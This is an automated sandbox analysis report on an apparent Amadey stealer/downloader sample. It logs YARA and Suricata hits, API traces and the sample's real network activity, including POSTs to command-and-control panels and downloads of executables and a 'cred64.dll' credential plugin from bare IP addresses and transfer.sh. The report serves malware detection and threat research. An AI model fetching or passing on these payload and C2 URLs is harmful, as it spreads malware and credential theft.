Summary | ZeroBOX

saiwer.exe

Trojan_PWS_Stealer Credential User Data Generic Malware SQLite Cookie Malicious Library UPX Malicious Packer Anti_VM PWS AntiDebug PNG Format PE File DLL OS Processor Check JPEG Format PE32 .NET EXE AntiVM
Category: FILE
Machine: s1_win7_x6403_us
Started: Dec. 8, 2022, 10:31 a.m.
Completed: Dec. 8, 2022, 10:52 a.m.
Size 241.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 369321f33d5ffaeeadb4da9f33c78156
SHA256 5c5db333e1a7ce5e55ffa3aca2858d8e431e6e1fc0dae0ca508c6081819828dd
CRC32 34D57A14
ssdeep 6144:nlvsfCqKGsJzgVvk/JUfL6pWnqujpiBLI89Xu:lkKpJI6pFujpiVFu
PDB Path D:\Mktmp\Amadey\Release\Amadey.pdb
Yara
  • IsPE32 - (no description)
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Malicious_Packer_Zero - Malicious Packer
  • UPX_Zero - UPX packed file

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49171 -> 31.41.244.237:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 31.41.244.253:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 31.41.244.253:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 31.41.244.253:80 -> 192.168.56.103:49173 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 31.41.244.253:80 -> 192.168.56.103:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 31.41.244.253:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 31.41.244.253:80 -> 192.168.56.103:49180 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 31.41.244.253:80 -> 192.168.56.103:49180 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 31.41.244.253:80 -> 192.168.56.103:49180 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 31.41.244.188:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 31.41.244.188:80 -> 192.168.56.103:49184 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 31.41.244.188:80 -> 192.168.56.103:49184 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 31.41.244.188:80 -> 192.168.56.103:49184 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 62.204.41.6:80 -> 192.168.56.103:49187 2402000 ET DROP Dshield Block Listed Source group 1 Misc Attack
TCP 192.168.56.103:49187 -> 62.204.41.6:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.103:49187 -> 62.204.41.6:80 2017598 ET MALWARE Possible Kelihos.F EXE Download Common Structure A Network Trojan was detected
TCP 62.204.41.6:80 -> 192.168.56.103:49187 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 62.204.41.6:80 -> 192.168.56.103:49187 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 62.204.41.6:80 -> 192.168.56.103:49187 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 62.204.41.6:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 23.160.193.16:80 -> 192.168.56.103:49193 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 23.160.193.16:80 -> 192.168.56.103:49193 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
UDP 192.168.56.103:64894 -> 164.124.101.2:53 2035948 ET POLICY IP Check Domain (iplogger .org in DNS Lookup) Potential Corporate Privacy Violation
TCP 192.168.56.103:49197 -> 148.251.234.83:443 2035949 ET POLICY IP Check Domain (iplogger .org in TLS SNI) Potential Corporate Privacy Violation
TCP 192.168.56.103:49197 -> 148.251.234.83:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49198 -> 148.251.234.83:443 2035949 ET POLICY IP Check Domain (iplogger .org in TLS SNI) Potential Corporate Privacy Violation
TCP 192.168.56.103:49198 -> 148.251.234.83:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49203 -> 31.41.244.253:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
UDP 192.168.56.103:53673 -> 164.124.101.2:53 2034316 ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh) Potentially Bad Traffic
UDP 192.168.56.103:53673 -> 164.124.101.2:53 2035139 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup) Misc activity
TCP 192.168.56.103:49210 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49210 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49215 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49215 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49214 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49214 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49211 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49211 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49179 -> 31.41.244.237:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49226 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49226 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 144.76.136.153:443 -> 192.168.56.103:49228 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 31.41.244.237:80 -> 192.168.56.103:49179 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 31.41.244.237:80 -> 192.168.56.103:49179 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 31.41.244.253:80 -> 192.168.56.103:49203 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 31.41.244.253:80 -> 192.168.56.103:49203 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 31.41.244.253:80 -> 192.168.56.103:49203 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 62.204.41.6:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 62.204.41.6:80 -> 192.168.56.103:49190 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 62.204.41.6:80 -> 192.168.56.103:49190 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49196 -> 149.28.253.196:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.103:53673 -> 8.8.8.8:53 2034316 ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh) Potentially Bad Traffic
UDP 192.168.56.103:53673 -> 8.8.8.8:53 2035139 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup) Misc activity
TCP 192.168.56.103:49225 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49225 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 148.251.234.83:443 -> 192.168.56.103:49199 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 144.76.136.153:443 -> 192.168.56.103:49212 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 144.76.136.153:443 -> 192.168.56.103:49216 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic

Suricata TLS

Flow: TLSv1 192.168.56.103:49196 -> 149.28.253.196:443
Issuer: C=CN, O=TrustAsia Technologies, Inc., CN=TrustAsia RSA DV TLS CA G2
Subject: CN=icodeps.com
Fingerprint: 87:db:69:7b:62:f3:12:4a:c6:40:1e:05:07:04:95:6d:41:8c:f8:26

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "gntuud.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer (25 single-character calls, one character each, concatenated): AreyousureYNprocessedfile
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer (13 single-character calls, one character each, concatenated): processedfile
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer (9 single-character calls, one character each, concatenated): Areyousur
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00433920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path D:\Mktmp\Amadey\Release\Amadey.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\InstallLocation
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb03df8
registers.esp: 1503128
registers.edi: 1503180
registers.eax: 0
registers.ebp: 1503192
registers.edx: 4287648
registers.ebx: 1504076
registers.esi: 38795740
registers.ecx: 0
1 0 0

__exception__

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1502140
registers.edi: 0
registers.eax: 1502140
registers.ebp: 1502220
registers.edx: 0
registers.ebx: 4937672
registers.esi: 4287648
registers.ecx: 2475455189
1 0 0

__exception__

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa376e8
registers.esp: 3468568
registers.edi: 3468620
registers.eax: 0
registers.ebp: 3468632
registers.edx: 3957368
registers.ebx: 3469524
registers.esi: 42038680
registers.ecx: 0
1 0 0

__exception__

exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 fc 76
exception.instruction: call qword ptr [rip + 0x91f16]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x980004
registers.r14: 258011384
registers.r15: 84809136
registers.rcx: 1308
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 258010640
registers.rsp: 258010360
registers.r11: 258014256
registers.r8: 2004779404
registers.r9: 0
registers.rdx: 1364
registers.r12: 258011000
registers.rbp: 258010496
registers.rdi: 51999680
registers.rax: 9961472
registers.r13: 84361792
1 0 0

__exception__

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7c7520
registers.esp: 2354728
registers.edi: 2354780
registers.eax: 0
registers.ebp: 2354792
registers.edx: 6364928
registers.ebx: 2355684
registers.esi: 36855816
registers.ecx: 0
1 0 0
Suspicious requests (the features that flagged each request are given in parentheses)
  • POST http://31.41.244.237/jg94cVd30f/index.php (POST method with no referer header, POST method with no useragent header, Connection to IP address)
  • POST http://31.41.244.237/jg94cVd30f/index.php?scr=1 (POST method with no referer header, POST method with no useragent header, Connection to IP address)
  • GET http://31.41.244.253/new/linda5.exe (GET method with no useragent header, Connection to IP address)
  • GET http://31.41.244.253/goga/nash.exe (GET method with no useragent header, Connection to IP address)
  • GET http://31.41.244.188/ano/anon.exe (GET method with no useragent header, Connection to IP address)
  • GET http://62.204.41.6/newlege.exe (GET method with no useragent header, Connection to IP address)
  • POST http://62.204.41.6/p9cWxH/index.php (POST method with no referer header, POST method with no useragent header, Connection to IP address)
  • POST http://62.204.41.6/p9cWxH/index.php?scr=1 (POST method with no referer header, POST method with no useragent header, Connection to IP address)
  • GET http://www.aculpainting.com/mp3studios97/mp3studios_97.exe (GET method with no useragent header)
  • GET http://www.aculpainting.com/mp3studios_97.exe (GET method with no useragent header)
  • GET http://transfer.sh/get/gI6LT0/loader.exe (GET method with no useragent header)
  • GET http://31.41.244.237/jg94cVd30f/Plugins/cred64.dll (GET method with no useragent header, Connection to IP address)
  • GET http://31.41.244.253/miha/wish.exe (GET method with no useragent header, Connection to IP address)
  • GET http://62.204.41.6/p9cWxH/Plugins/cred64.dll (GET method with no useragent header, Connection to IP address)

Requests
  • POST http://31.41.244.237/jg94cVd30f/index.php
  • POST http://31.41.244.237/jg94cVd30f/index.php?scr=1
request GET http://31.41.244.253/new/linda5.exe
request GET http://31.41.244.253/goga/nash.exe
request GET http://31.41.244.188/ano/anon.exe
request GET http://62.204.41.6/newlege.exe
request POST http://62.204.41.6/p9cWxH/index.php
request POST http://62.204.41.6/p9cWxH/index.php?scr=1
request GET http://www.aculpainting.com/mp3studios97/mp3studios_97.exe
request GET http://www.aculpainting.com/mp3studios_97.exe
request GET http://transfer.sh/get/gI6LT0/loader.exe
request GET http://31.41.244.237/jg94cVd30f/Plugins/cred64.dll
request GET http://31.41.244.253/miha/wish.exe
request GET http://62.204.41.6/p9cWxH/Plugins/cred64.dll
request GET https://www.icodeps.com/
request POST http://31.41.244.237/jg94cVd30f/index.php
request POST http://31.41.244.237/jg94cVd30f/index.php?scr=1
request POST http://62.204.41.6/p9cWxH/index.php
request POST http://62.204.41.6/p9cWxH/index.php?scr=1
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2768
region_size: 1867776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02180000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2768
region_size: 1867776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02350000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2768
region_size: 1081344
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02520000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2768
region_size: 1093632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02630000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2768
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00890000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008c1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00700000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3028
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3028
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71fe2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a60000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00532000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00565000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0056b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00567000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0054c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0053a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00556000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0054a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0053c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00558000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00caf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ca0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ca1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b03000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b04000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0054d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b05000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3028
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b06000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
